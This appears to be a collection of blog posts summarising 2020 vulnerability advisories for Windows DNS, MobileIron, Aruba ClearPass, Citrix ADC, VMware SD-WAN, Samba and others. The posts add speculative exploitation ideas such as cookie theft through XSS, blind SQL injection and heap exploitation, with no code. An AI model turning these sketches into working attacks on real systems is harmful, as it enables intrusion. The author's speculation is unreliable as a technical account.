Preface: Perhaps we ignore DNS server side design weakness so far. It is on the way impacting cyber security world.

Background: DNS is a hierarchical client-server protocol. Each domain is served by one or more DNS servers, meaning requests for subdomains are sent to these servers. Replies can also be cached by intermediate servers in order to improve performance.

(CVE-2020-1350) Vulnerability detail: A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests.

Official detail – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

Observation: The RDLENGTH bounds-check design weakness may relate to trigger this flaw. If pointer overflows wrap around (undefined behaviour) this would allow an attacker to circumvent the bounds-check and exposes a buffer overflow vulnerability since the attacker controlled addrlen is later used in memcpy(addr_out, bufpos, addrlen), potentially allowing a code execution.

Preface: Mobile has 50.13%, Desktop has 47.06% – June 2019 – June 2020

Background: MobileIron helps you simplify the configuration of enterprise settings including email, Wi-Fi, and VPN and more. Meanwhile, MobileIron provides unified endpoint and enterprise mobility management (EMM) for mobile devices.

Vulnerabilities details: Please refer to url https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

Comment: The official announcement did not provide a reason for the vulnerability. We can use assumption to understand the popular cyber attack techniques. Apart from scenario displayed on attached diagram. The attacker can exploit malware to do the attack. For instance, attacker can implant malware to the endpoint by phishing attack. It can read the plaintext derived credentials from the flash storage after the software token has been activated, and transmit them to the adversary responsible for the malware, who can then use them at will on a different machine.

Preface: WiFi features from beginning phase a small group of access extended to enterprises infrastructure nowadays. Even the IoT 4.0 and Industrial system especially ICS and IACS system will be found his footprint.

Background: Aruba’s ClearPass Policy Manager, part of the Aruba 360 Secure Fabric, provides role- and device-based secure network access control for IoT, BYOD, corporate devices, as well as employees, contractors and guests across any multivendor wired, wireless and VPN infrastructure.

About the subject: The official announcement has been released on 2nd June 2020 – https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-005.txt

However the details of PoC just released 2 days ago. The PoC shown that it require using the C preprocessor generic programming interface defined in unistd[.]h. In additional it require to use compiler and conduct the re-engineering for payload library.
But the most important thing is that to successfully utilize the PoC code, user authentication is required. However, if the system administrator has not patched CVE-2018-7076 in the past. It will provide benefits for attackers. Easily exploit vulnerabilities discovered in June 2020.

Preface: Typically, North-South traffic is load balanced by Ingress devices such as Citrix ADCs while East-West traffic is load balanced by kube-proxy. Since kube-proxy only provides limited layer-4 load balancing, service owners can utilize the Citrix ingress controller to achieve sophisticated layer-7 controls for East-West traffic using the Ingress CPX ADCs.

Security Focus: With reference with Citrix technical article (Security Bulletin CTX276688). There are total of 11 vulnerabilities. Because of CVE-2020-8191 (Reflected Cross Site Scripting (XSS)). And therefore it provides a way for attacker utilize XSS vulnerability to steal the session cookie. This design weakness is similar to responding to other vulnerabilities that require user credentials.

Background: The NSIP address is the IP address at which you access the Citrix ADC appliance for management purposes. The appliance can have only one NSIP, which is also called the management IP address. You must add this IP address when you configure the Citrix ADC for the first time. You cannot remove an NSIP address.

Vulnerability detail: Citrix ADC and Citrix Gateway could allow a remote authenticated attacker to gain elevated privileges on the system, caused by an unspecified flaw. By sending a specially-crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privilege. Utilize XSS vulnerability to steal the session cookie.

Official announcement – https://support.citrix.com/article/CTX276688

Background: The VMware SD-WAN Orchestrator provides centralized enterprise-wide installation, configuration and real-time monitoring in addition to orchestrating the data flow through the cloud network.

Technical highlight – The VeloCloud Orchestrator (VCO) stores only flow statistics with high resolution to provide visibility and troubleshooting capability.
By default, a maximum of one million flows are rolled up per edge per day. This averages out to approximately 3500 flows per 5-minute push.

Vulnerability details: In 3.3.0 release, the VeloCloud Orchestrator (VCO) stores only flow statistics with high resolution to provide visibility and troubleshooting capability. In 3.3.2 release, VCO supports retention of flow stats for upto one year by rolling up flow stats for every edge on a daily basis. So, the VeloCloud Orchestrator requires connect to MySQL server. Meanwhile it has design weakness. The original design does not apply correct input validation which allows for blind SQL-injection.

Impact: A crafted SQL queries and obtain data to which they are not privileged.

Official announcement – https://www.vmware.com/security/advisories/VMSA-2020-0016.html

Preface: Bootstrap modal forms are displayed-on-action pop-up forms that are used for gathering data from website visitors and to register or log users.

Background: PHPZAG[.]COM is a programming blog that publishes practical and useful tutorials for programmers and web developers.

Solution formulated by PHPZAG – Live Add, Edit and Delete Datatables Records with Ajax, PHP & MySQL, solution formulated by PHPZAG.
Step 1 – Handle modal form submit using jQuery and make Ajax request with action addRecord to add new records.
Step 2 – Use call method addRecord() on action addRecord to add new records.
Step 3 – Create method addRecord() in class Records.php to add new records into MySQL database.

The vulnerability found on 19th May 2020, but NVD published on 7th July , 2020 finally. The source file can be download in the following url – https://www.phpzag.com/live-add-edit-delete-datatables-records-with-ajax-php-mysql/

Vulnerability details:
CVE-2020-8519 SQL injection in search parameter
CVE-2020-8520 SQL Injection in line 29 with ‘order’ and ‘column’ parameter
CVE-2020-8521 SQL Injection line 35 with ‘start’ and ‘length’ parameters

Preface: Nginx was written specifically to address the performance limitations of Apache web servers

Background: In March 2019, Nginx Inc was acquired by F5 Networks for US$670 million. According to statistic on 2020. Nginx server deployed by “375 million websites. There are 1,500 paying customers.

Vulnerability detail : A malicious user with access to the host where NGINX Controller is running on may eavesdrop on NATS connections and, thereby, gain unauthorized access data stored in the message queue. Please refer to the website for details – https://support.f5.com/csp/article/K59209532

Observation: The possible ways to exploit this vulnerability are as follows:
Refer to attached diagram, under such circumstances, design require ingress expose the cluster via a host port and also make it possible to advertise its public ip addresses.
A malicious user with access to the host where NGINX Controller is running on may eavesdrop on NATS connections and, thereby, gain unauthorized access data stored in the message queue.

Remedy: Upgrade to 3.6.0

Preface: A set of unsafe default configurations for LDAP channel binding and LDAP signing exist on Active Directory domain controllers that let LDAP clients communicate with them without enforcing LDAP channel binding and LDAP signing. This can open Active Directory domain controllers to an elevation of privilege vulnerability, said Microsoft.

Notice: If you are a Samba user, you should remain vigilant. Fix it immediately.

CVE-2020-10730
A client combining the ‘ASQ’ and ‘VLV’ LDAP controls can cause a NULL pointer de-reference and further combinations with the LDAP paged_results feature can give a use-after-free in Samba’s AD DC LDAP server.
https://www.samba.org/samba/security/CVE-2020-10730.html

CVE-2020-10745
Parsing and packing of NBT and DNS packets can consume excessive CPU in the AD DC (only)
Compression of replies to NetBIOS over TCP/IP name resolution and DNS packets (which can be supplied as UDP requests) can be abused to consume excessive amounts of CPU on the Samba AD DC (only).
https://www.samba.org/samba/security/CVE-2020-10745.html

CVE-2020-10760
The use of the paged_results or VLV controls against the Global Catalog LDAP server on the AD DC will cause a use-after-free.
https://www.samba.org/samba/security/CVE-2020-10760.html

CVE-2020-14303
The AD DC NBT server in Samba 4.0 will enter a CPU spin and not process further requests once it receives a empty (zero-length) UDP packet to port 137.
https://www.samba.org/samba/security/CVE-2020-14303.html

Reference:
– De-referencing it means trying to access whatever is pointed to by the pointer.
– Use-After-Free vulnerabilities are a type of memory corruption flaw that can be leveraged by hackers to execute arbitrary code.

Preface: Currently, there are no known workarounds or mitigations for these vulnerabilities. Thankfully, the Redmond adds that the flaws are not publicly disclosed and that there are no known exploits in the wild. The firm credits Trend Micro’s Zero Day Initiative for privately disclosing the bugs.

Background:
From security point of view, attacker who keen to bypassing Windows Heap Protection traditionally by re-use method. However Microsoft had build heap protection since windows XP SP2 age. As of today, generic heap exploitation approaches not effective. There is no more easy write4. But attacker can relies on application technique. Which means controlling the controlling the algorithm to position data carefully on the heap. The historical method like Multiple Write4 with a combination of the Lookaside and the FreeList.

Microsoft has released security updates to address vulnerabilities in Windows 10.

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425